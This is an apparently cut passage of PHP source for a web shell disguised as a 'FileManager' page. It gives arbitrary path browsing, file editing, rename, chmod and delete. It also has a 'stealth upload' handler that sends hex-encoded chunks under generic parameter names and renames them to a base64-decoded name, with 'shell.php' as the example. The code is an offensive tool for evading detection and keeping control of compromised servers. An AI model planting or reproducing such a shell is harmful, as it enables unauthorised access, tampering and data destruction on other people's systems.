'; exit; } // --- CONFIG & UTILS --- $root = realpath(isset($_GET['p']) ? $_GET['p'] : '.'); if (!$root) $root = getcwd(); $root = str_replace('\\', '/', $root); $msg = ''; function msg($t, $c = 'green') { return "
$t
"; } // --- HANDLERS --- // 1. STEALTH UPLOAD HANDLER // Uses generic parameter names: 'h' (hex data), 't' (temp name), 'f' (finalize real name) if (isset($_POST['t']) && isset($_POST['h'])) { // Append Chunk $temp_file = $root . '/.tmp_' . preg_replace('/[^a-zA-Z0-9]/', '', $_POST['t']); // Sanitize temp name $data = hex2bin($_POST['h']); if (file_put_contents($temp_file, $data, FILE_APPEND) !== false) { die("OK"); } else { header("HTTP/1.1 500 IO Error"); die("FAIL"); } } // Finalize Upload (Rename) if (isset($_POST['finalize_t']) && isset($_POST['finalize_n'])) { $temp_file = $root . '/.tmp_' . preg_replace('/[^a-zA-Z0-9]/', '', $_POST['finalize_t']); $real_name = base64_decode($_POST['finalize_n']); // Decode real name (e.g. shell.php) $target_file = $root . '/' . basename($real_name); if (file_exists($temp_file)) { if (rename($temp_file, $target_file)) { die("DONE"); } else { die("RENAME_FAIL"); } } else { die("NO_TEMP"); } } // 2. EDIT if (isset($_POST['save_p']) && isset($_POST['save_c'])) { if (file_put_contents($_POST['save_p'], $_POST['save_c']) !== false) $msg = msg("Saved."); else $msg = msg("Save failed.", "red"); } // 3. RENAME if (isset($_POST['rn_old']) && isset($_POST['rn_new'])) { if (rename($root . '/' . $_POST['rn_old'], $root . '/' . $_POST['rn_new'])) $msg = msg("Renamed."); else $msg = msg("Rename failed.", "red"); } // 4. CHMOD if (isset($_POST['perm_f']) && isset($_POST['perm_v'])) { if (chmod($root . '/' . $_POST['perm_f'], octdec($_POST['perm_v']))) $msg = msg("Chmod OK."); else $msg = msg("Chmod failed.", "red"); } // 5. DELETE if (isset($_GET['del'])) { $del = $root . '/' . $_GET['del']; if (is_dir($del)) { @rmdir($del); } else { @unlink($del); } $msg = msg("Deleted."); } // --- VIEW --- $list = scandir($root); $dirs = []; $files = []; foreach ($list as $i) { if ($i == '.') continue; if (is_dir("$root/$i")) $dirs[] = $i; else $files[] = $i; } $edit_file = isset($_GET['e']) ? "$root/" . $_GET['e'] : null; $edit_content = $edit_file ? file_get_contents($edit_file) : ''; ?>

FileManager

Logout
Path: $p): if ($p === '') continue; ?> /


Cancel
Stealth Upload (Hex-Chunked)
Name Size Perm Action
..
[D] "> - X
KB X